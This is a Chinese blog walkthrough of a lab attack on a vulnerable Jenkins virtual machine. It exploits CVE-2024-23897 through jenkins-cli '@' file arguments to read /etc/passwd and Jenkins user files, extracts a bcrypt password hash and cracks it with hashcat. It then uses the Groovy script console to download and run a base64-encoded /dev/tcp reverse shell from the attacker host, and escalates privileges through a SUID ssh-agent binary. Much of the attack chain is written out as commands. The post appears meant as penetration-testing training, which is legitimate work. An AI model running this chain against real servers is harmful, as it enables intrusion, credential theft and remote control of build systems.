Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙

已于 2024-03-05 17:23:01 修改
阅读量1.7k 收藏 30
点赞数 17
分类专栏: 渗透测试 文章标签: jenkins 哈希算法 servlet
于 2024-03-05 09:04:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34594929/article/details/136446671
版权

一、前言

本文将深入研究一项涉及Jenkins的安全漏洞(CVE-2024–23897),将在实验室中介绍这些概念,这些技能对于渗透测试期间有效管理输出至关重要,而在本次漏洞利用中,更显得尤为关键。

本文还涉及Jenkins凭证管理,针对Jenkins部署,指导参与者如何查找存储的用户和密码信息。更加刺激的是,我们将引导参与者使用Hashcat破解这些凭据,进一步揭露其中的安全挑战。

实验的一大亮点是反向Shell测试,要求学员使用Jenkins内置的Groovy脚本控制台建立反向Shell。通过一个非常典型的试错过程,参与者将亲身体验实现远程命令执行的刺激和挑战。

最后,我们将探讨权限升级,一旦shell访问得到保护,参与者将识别并利用设置了SUID位的二进制文件进行权限升级。

二、 Jenkins (CVE-2024–23897) 靶机主题

此次靶场攻击主题内容:

  • 了解 CI / CD:参与者将从基础知识开始,了解 Jenkins 是什么及其通过持续集成/持续部署 (CI/CD)(Security+
    认证的基本概念)实现软件开发自动化方面的作用。 文件描述符:实验室介绍了文件描述符,重点关注 STDOUT 和
    STDERR,教参与者如何操作这些流。这些知识对于有效管理渗透测试期间的输出至关重要。
  • 输出抑制和重定向:以文件描述符为基础,参与者将练习根据所涉及的文件描述符抑制和重定向输出,这是任何有抱负的渗透测试人员工具包中的一项重要技能。
  • Jenkins 凭证:该活动针对 Jenkins 部署,指导参与者如何查找存储的用户和密码信息。 使用 Hashcat
    破解密码:参与者提取凭据并使用 Hashcat 破解它们。
  • 反向Shell测试:本实验的一大亮点,本部分要求学员使用Jenkins内置的Groovy脚本控制台建立反向Shell,通过一个非常典型的试错过程来实现远程命令执行。
  • 权限升级:一旦 shell 访问得到保护,参与者将识别并利用设置了 SUID 位的二进制文件来进行权限升级,了解 SUID
    位的重要性及其在类 Unix 操作系统中的作用。

三、靶机配置

下载靶机:
https://drive.google.com/file/d/1YD7fyJIjPCV3FtUfnK7UbxlMnUdrvA6X/view

下载后给靶机生成一个MAC地址:

00:50:56:3D:BD:9B

在这里插入图片描述
配置之后开机,你是没有密码进行登陆的所以这个不理它
在这里插入图片描述
我们给靶机生成过了MAC,这个需要进行定义MAC,必须也要在一个局域网里!要不然找不到

sudo arp-scan --localnet | grep 00:50:56

在这里插入图片描述

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sC -sV 192.168.207.132
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 11:15 CST
Nmap scan report for 192.168.207.132
Host is up (0.00082s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Jetty 10.0.18
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(10.0.18)
|_http-title: Dashboard [Jenkins]

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds

在这里插入图片描述
我们需要从靶机系统下载一个Jenkins客户端,这个客户端后面用于利用,先创建一个文件夹
在这里插入图片描述
然后执行wget把jenkins-cli.jar提取到文件里面,如果出现错误多尝试几次,把它提取出来!

┌──(kali㉿kali)-[~/jenkins-exploit]
└─$ wget http://192.168.207.132:8080/jnlpJars/jenkins-cli.jar 
--2024-03-04 11:36:00--  http://192.168.207.132:8080/jnlpJars/jenkins-cli.jar
正在连接 192.168.207.132:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:3623400 (3.5M) [application/java-archive]
正在保存至: “jenkins-cli.jar”

jenkins-cli.jar                 100%[====================================================>]   3.46M  --.-KB/s  用时 0.05s   

2024-03-04 11:36:00 (67.7 MB/s) - 已保存 “jenkins-cli.jar” [3623400/3623400])

在这里插入图片描述

四、本地文件读取漏洞

使用CLI命令测试查询在服务器上是否启用了匿名读取权限,注意IP地址需要换成你自己的!

java -jar jenkins-cli.jar -s http://192.168.207.132:8080 help '@/etc/pass

在这里插入图片描述
通过Jenkins客户端的help形式成功向我们展示了/etc/passwd/文件的第一行。
值得我们注意的是。此漏洞的一个关键方面是,不同的命令可以读取文件中不同数量的行数,在help情况下只返回一行。

获取可用命令的完整列表:

java -jar jenkins-cli.jar -s http://192.168.207.132:8080 help

在这里插入图片描述
在本实验的下一部分中,我们将编写一个脚本来测试这些命令中的每一个,以查看可以读取/etc/passwd中的行数。本节是shell脚本编写中一个有趣的实用练习。首先,只需将 help 命令的输出重定向到名为 output.txt 的文件即可。

java -jar jenkins-cli.jar -s http://192.168.207.132:8080 help > output.txt

在这里插入图片描述

┌──(root㉿kali)-[/home/kali/jenkins-exploit]
└─# ls                              
jenkins-cli.jar  output.txt
                                                                                                                       
┌──(root㉿kali)-[/home/kali/jenkins-exploit]
└─# cat output.txt

output.txt 是一个空的文件夹
在这里插入图片描述
这是因为此处的 help 命令的输出是打印到 STDERR 而不是 STDOUT。
在 Linux 系统上:

  • STDOUT与文件描述符1相关联
  • STDERR与文件描述符2相关联

当我们使用>字符将输出重定向到文件时,默认情况下它会将打印的信息重定向到STDOUT或文件描述符1。

  • 帮助输出将改为发送到STDERR,我们可以将STDERR(文件描述符2)输出重定到这样的文件。
java -jar jenkins-cli.jar -s http://192.168.207.132:8080 help 2> output.txt

在这里插入图片描述
TXT文本包含了当前的两条信息

  • 我们可以运行的命令
  • 此命令的说明

所以下面要编写一个脚本来枚举每个可用命令来测试它将从/etc/passwd文件返回的行数,我们需要执行以下操作

  • 删除包含说明的每一行
  • 保留包含我们要测试的实际命令的每一行

如果打开output.txt 你会发现每个命令从行首开始2个空格,而描述始终从行首开发4个空格。
在这里插入图片描述创建一个output2.txt的文本,直接将下面的命令给丢进去

add-job-to-view
build
cancel-quiet-down
clear-queue
connect-node
console
copy-job
create-credentials-by-xml
create-credentials-domain-by-xml
create-job
create-node
create-view
declarative-linter
delete-builds
delete-credentials
delete-credentials-domain
delete-job
delete-node
delete-view
disable-job
disable-plugin
disconnect-node
enable-job
enable-plugin
get-credentials-as-xml
get-credentials-domain-as-xml
get-gradle
get-job
get-node
get-view
groovy
groovysh
help
import-credentials-as-xml
install-plugin
keep-build
list-changes
list-credentials
list-credentials-as-xml
list-credentials-context-resolvers
list-credentials-providers
list-jobs
list-plugins
mail
offline-node
online-node
quiet-down
reload-configuration
reload-job
remove-job-from-view
replay-pipeline
restart
restart-from-stage
safe-restart
safe-shutdown
session-id
set-build-description
set-build-display-name
shutdown
stop-builds
update-credentials-by-xml
update-credentials-domain-by-xml
update-job
update-node
update-view
version
wait-node-offline
wait-node-online
who-am-i

下面创建一个Bash 脚本,用于生成一个名为 enum.sh 的脚本文件。该脚本的作用是循环读取 output2.txt 文件中的每一行(假设这些行是 Jenkins CLI 命令),然后为每个命令生成一个输出。

让我们来解释这个命令的各个部分:

  1. cat output2.txt: 读取 output2.txt 文件的内容。
  2. while read cmd; do: 使用 while 循环逐行读取 output2.txt 中的内容,并将每一行赋值给变量 cmd
  3. echo "echo -n \"$cmd: \"; java -jar jenkins-cli.jar -s http://192.168.207.132:8080 $cmd @'/etc/passwd' 2>&1 | wc -l": 为每个命令生成一个字符串,其中包含了用于执行 Jenkins CLI 命令的语法。这个字符串包含了命令本身以及将输出重定向到 /etc/passwd 文件,并通过 wc -l 命令统计行数。
  4. done: 结束循环。
  5. > enum.sh: 将循环生成的字符串输出到名为 enum.sh 的文件中,覆盖现有的文件内容(如果文件已存在)。

所以,enum.sh 文件中的内容将包含一系列的命令,每个命令都以其原始命令为前缀,并在其后执行 Jenkins CLI 命令,并输出到 /etc/passwd 文件。

cat output2.txt | while read cmd; do echo "echo -n \"$cmd: \"; java -jar jenkins-cli.jar -s http://192.168.207.132:8080 $cmd @'/etc/passwd' 2>&1 | wc -l"; done > enum.sh

cat enum.sh

在这里插入图片描述创建完enum.sh看看里面有没有内容,IP是不是准确的,以防后面出问题,运行脚本前给个权限。

chmod 777 enum.sh 
./enum.sh

在这里插入图片描述
脚本似乎按预期运行了。它执行了每个 Jenkins CLI 命令,并将输出重定向到 /etc/passwd 文件,然后通过 wc -l 统计了输出的行数。

每一行的格式是 <命令>: <行数>。行数表示执行该 Jenkins CLI 命令后输出的行数。

请注意,对于一些敏感的操作,例如 delete-job、delete-node、delete-view、offline-node 和 online-node,输出行数较多。这是因为这些操作可能会对 Jenkins 环境产生重大影响,输出包含了相关的信息。

java -jar jenkins-cli.jar -s http://192.168.207.132:8080 connect-node '@/etc/passwd'

在这里插入图片描述

五 、枚举Jenkins用户、提取密码哈希值(破解)

Jenkins 安装将有一个文件,其中列出了此处的所有有效用户。

  • /var/jenkins_home/users/users.xml

使用 connect-node 命令读取此文件,如下所示

java -jar jenkins-cli.jar -s http://192.168.207.132:8080 connect-node '@/var/jenkins_home/users/users.xml'

在这里插入图片描述
users.xml显示系统上的单个用户,kyle_reese,其文件夹为 /var/jenkins_home/users/kylereese_12022439290147957862

在 Jenkins 上的每个用户文件夹中,始终有一个包含用户密码哈希的config.xml文件。读取文件夹中的config.xml kylereese_12022439290147957862

java -jar jenkins-cli.jar -s http://192.168.207.132:8080 connect-node '@/var/jenkins_home/users/kylereese_12022439290147957862/config.xml'

在这里插入图片描述
复制找到的密码哈希并将其粘贴到 Kali 上名为 hashes.txt 的文件中。

pico hashes.txt

然后把哈希写进去

$2a$10$GqneLZhOq6hRpCXeXF07tuAN..Q8GKDv5zad/HfcpNpL8GJUNNdDO

1.按下 Ctrl + O:这将会触发保存文件的操作。
2.按下 Enter:确认文件名。
3.按下 Ctrl + X:这将会退出 pico 编辑器。
在这里插入图片描述
接下来,我们将执行以下操作来破解此哈希值并确定实际密码是什么:

  1. cp /usr/share/wordlists/rockyou.txt.gz:复制(cp)RockYou密码字典的压缩文件 rockyou.txt.gz 到当前目录(或者需要指定的目标目录)。

  2. gunzip rockyou.txt.gz:解压缩 rockyou.txt.gz 文件,将其还原为 rockyou.txt 文件。这一步是因为 RockYou 字典通常以 gzip 压缩的形式提供,所以需要使用 gunzip 命令进行解压缩。

  3. hashcat hashes.txt rockyou.txt:使用 Hashcat 工具,对名为 hashes.txt 的哈希文件进行破解,使用 rockyou.txt 字典进行密码破解攻击。这假设 hashes.txt 包含已经获取的密码哈希,而 rockyou.txt 包含可能的密码列表。

cp /usr/share/wordlists/rockyou.txt.gz .

gunzip rockyou.txt.gz

hashcat hashes.txt rockyou.txt

注意看截图的第一条命令,复制命令还有一个符号,没有的话会提示缺少目标文件,下面使用3200模式来破解
在这里插入图片描述

hashcat -m 3200 hashes.txt rockyou.txt

过程需要等待,因为是虚拟机给配置不高,所以等它跑完
在这里插入图片描述
在这里插入图片描述
获得密码后,您将能够使用以下命令登录 Jenkins Web 界面:

  • 账号:kyle_reese
  • 密码:mastermind

六、后台命令执行 反弹Shell

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
Jenkins 脚本控制台在官方用户手册中可以看到可以进行命令执行
在这里插入图片描述

println "cat /etc/passwd".execute().text

在这里插入图片描述

(1)反弹shell

  • 将反向 shell 代码放入脚本文件中。
  • 强制 Jenkins 服务器使用 curl 之类的东西下载这个脚本
  • 强制 Jenkins 服务器在本地执行
    从这里直接生成Shell https://www.revshells.com/访问不了可以访问这个https://www.ddosi.org/shell/
    在这里插入图片描述
echo -n '/bin/sh -i >& /dev/tcp/192.168.207.128/9001 0>&1' | base64 -d | /bin/bash

base一下

echo -n 'L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNy4xMjgvOTAwMSAwPiYx' | base64 -d | /bin/bash

在 Kali 上创建一个名为 exploit.sh 的文件,并将 base64 编码的反向 shell 代码复制到其中。

pico exploit.sh

1.按下 Ctrl + O:这将会触发保存文件的操作。
2.按下 Enter:确认文件名。
3.按下 Ctrl + X:这将会退出 pico 编辑器。
在这里插入图片描述
然后在目录下起个python服务
在这里插入图片描述
使用 curl 命令将此文件提取到 Jenkins 服务器 /tmp 目录。

println "curl http://192.168.207.128:8000/exploit.sh -o /tmp/exploit.sh".execute().text

在这里插入图片描述
您应该在python服务中的日志输出中看到 Web 服务器收到了状态代码为 200 的点击。
然后给Shell权限,确保文件在目标服务器上可执行:

println "chmod 777 /tmp/exploit.sh".execute().text

在这里插入图片描述
Kali NC开起来
在这里插入图片描述
直接运行Shell,NC传回反应

println "/bin/bash /tmp/exploit.sh".execute().text

在这里插入图片描述
但是无权限读取文件,那么就需要进行权限提升!
在这里插入图片描述

(2)权限提升

find / -perm -4000

在这里插入图片描述

find / -perm -4000 2>/dev/null

在这里插入图片描述

ssh-agent /bin/bash -p

在这里插入图片描述

七、结束语

在本文中,我们深入探讨了Jenkins的一个安全漏洞(CVE-2024–23897),通过实际的实验室操作,带你一步步了解渗透测试的关键技术和步骤。从文件描述符和输出管理到Jenkins凭证的挖掘,再到密码破解和反向Shell建立,最后到权限提升,每个环节都涉及了渗透测试中的重要方面。目前此文还有更多的技术面和难题是不容易摸清的,我还是需要有空的时候重温一下。

David_Jou
关注
  • 17
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
cpp-jenkins-template:C ++项目的Jenkins工作模板
05-09
詹金斯Cpp模板 通过“ CppCheck + CppLint + CppNCSS + SLOC + CLOC + Deploy + Email”过程。 使用这些文件可以在C ++项目中搭建您的Continuous Integration Server。 这是由Sebastian Bergmann( )启发的。 概述 要求 在您的jenkins实例上,您必须安装一些QA python工具: $ cppcheck --enable=all --inconclusive --xml --xml-version=2 ${WORKSPACE}/SOURCE_FOLDER 2> ${WORKSPACE}/OUTPUT_FOLDER/cppcheck.xml 仅单个Cpp文件支持,请检查cpplint-all.py以获取文件夹支持; $ pip install cpplint $ p
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
Jenkins任意文件读取CVE-2024-23897
qq_51175992的博客
03-11 717
Jenkins是一个开源的自动化服务器。Jenkins使用args4j来解析命令行输入,并支持通过HTTP、Websocket等协议远程传入命令行参数。args4j中用户可以通过@字符来加载任意文件,这导致攻击者可以通过该特性来读取服务器上的任意文件。该漏洞影响Jenkins 2.441及以前的版本。
docker-jenkins-django-tutorial:实战Docker + Jenkins + Django + Postgres:memo:
02-04
docker-jenkins-django-tutorial:实战Docker + Jenkins + Django + Postgres:memo:
CVE-2018-8897
08-01
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络进行攻击。 建议大家及时将 Weblogic 升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
[CVE-2024-23897]Jenkins CLI 任意文件读取漏洞导致远程代码执行漏洞
whoami
01-26 3713
Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,该库默认将参数中 @ 字符后的文件路径替换为文件内容,攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件),并结合 Resource Root URL、Remember me cookie、存储型 XSS 或 CSRF 等在 Jenkins 控制器中执行任意代码。Jenkins CLI 是 Jenkins 内置的命令行页面。
CVE-2024-23897 Jenkins 任意文件读取漏洞
LJQClqjc的博客
01-26 2693
Jenkins 有一个内置的命令行界面CLI,在处理 CLI 命令时Jenkins 使用args4j 库解析 Jenkins 控制器上的命令参数和选项。此命令解析器具有一个功能,可以将@参数中后跟文件路径的字符替换为文件内容 ( expandAtFiles)。根据Jenkins 官方描述,具有Overall/Read权限的攻击者可以读取整个文件,未授权的攻击者仅能读取文件前几行内容。攻击者可以通过读取jenkins文件获取相关密钥从而实现命令执行。
CVE-2024-23897复现及IDS中snort防御规则制定
2401_82670286的博客
01-30 2091
CVE-2024-23897是一个涉及Jenkins未授权文件读取的漏洞。它利用了Jenkins命令行接口(CLI)的特性,其中CLI使用args4j库解析命令行参数。args4j库具有一个特点,即当命令行参数以@字符开头时,该参数会被视为文件路径,并将该文件内容读取作为参数。利用这一特性,攻击者可以通过Jenkins CLI读取Jenkins服务器上的任意文件。这段代码的主要问题在于它处理以字符开头的命令行参数时,会尝试将其视为文件路径,并读取文件的内容。具体来说,如果参数以。
Goby 漏洞发布|亿赛通电子文档安全管理系统 UpgradeService1 接口远程代码执行漏洞
m0_46699477的博客
01-26 1066
CloudBees Jenkins(前称Hudson Labs)是美国 CloudBees 公司的一套基于Java开发的持续集成工具,它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
【已复现】Jenkins 任意文件读取漏洞(CVE-2024-23897)附POC下载
Elliot1314的博客
01-28 2827
Jenkins是一个开源CI/CD工具,用于自动化开发流程,包括构建、测试和部署软件。2024年1月,互联网公开了一个Jenkins任意文件读取漏洞。鉴于该漏洞易于利用,存在危害扩大的风险,且该系统数据较为敏感且影响范围广泛,建议所有使用Jenkins的企业尽快进行修复,以确保系统安全。内置的命令行接口(CLI)存在一个特性,允许在命令参数中用@字符后跟文件路径来替换为文件内容。这导致攻击者能够读取Jenkins控制器文件系统上的任意文件
CVE-2019-11043:php-fpm + Nginx RCE
03-08
CVE-2019-11043 php-fpm + Nginx RCE 0x01安装phuip-fpizdam-Mac go get github.com/neex/phuip-fpizdam go install github.com/neex/phuip-fpizdam ale@Pentest ~/go go get github.com/neex/phuip-fpizdam ale@Pentest ~/go go install github.com/neex/phuip-fpizdam ale@Pentest ~/go ls bin src ale@Pentest ~/go cd bin ale@Pentest ~/go/bin ls phuip-fpizdam ale@Pentest ~/go/bin file phuip-fpizdam phuip-fpizdam: Mac
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoC:Jenkins RCE SECURITY-1266 / CVE-2019-1003000(脚本安全性),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明性) 一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的用户绕过沙盒保护,并在Jenkins主节点或节点上执行任意代码。 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
前言前几天听小伙伴说 Jenkins 出了个 RCE 我以为是说之前那个需要登录后才能RCE 的漏洞 。但结果小伙伴说这次这个不用登录就能 RCE 是 Oran
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -h Options: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads (default: 100) $ ./CVE-2013-6117 -f hostfile.txt 1.2.4.4|name.no-ip.org:80|username|password $ ./CVE-2013-6117 -t 1.2.3.4 1.2.4.4|name.no-ip.org:80|username|password 参考:
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011-2232, CVE-2011-2238, CVE-2011-2239, CVE-2011-2242, CVE-2011-2243, CVE-2011-2244, CVE-2011-2248, CVE-2011-2253, CVE-2011-2257CVE-2011-0799 CVE-2011-0805 CVE-2009-3555 CVE-2011-0793, CVE-2011-0804, CVE-2011-0806 (Windows only)
【Elasticsearch】安装配置与使用
最新发布
apollo_miracle的博客
04-29 585
elasticsearch安装部署
Jenkins】持续集成与交付 (五):Jenkins用户权限管理
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
04-28 2658
🟣【Jenkins】持续集成与交付 (五):Jenkins用户权限管理
Jenkins实现cherry-pick多个未入库的gerrit编译Android固件
fred专栏
04-28 1241
其他gerrit才能编译过,我们可以在commit message中加入特殊字段,让jenkins在编译此笔patch的时候同时抓取依赖的gerrit代码下来一起编译(本文不讨论,会专门写一篇文章讨论这种需求)。还有一种场景,开发人员修改了多个仓库比如kernel, uboot等仓库,虽然编译上没有依赖,但仍然期望jenkins可以支持将这多笔提交一起编译一个版本(本文要讨论的方案)。,开发者提交一笔的时候自动触发jenkins编译,如果提交的这一笔的。在做Android固件开发的时候,通常我们可以利用。
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
CVE-2022-2048是Jenkins中的一个安全漏洞,存在于Jenkins的SSH插件中。攻击者可以利用该漏洞通过SSH连接到Jenkins主机并执行任意命令。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以利用该漏洞在Jenkins服务器上执行任意代码,甚至获取管理员权限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 为了防止这些漏洞的利用,建议及时更新Jenkins软件,尽可能使用最新版本,并遵循最佳的安全实践。此外,也可以采取其他措施,如限制Jenkins服务器的网络访问权限,使用防火墙保护服务器等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

David_Jou

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值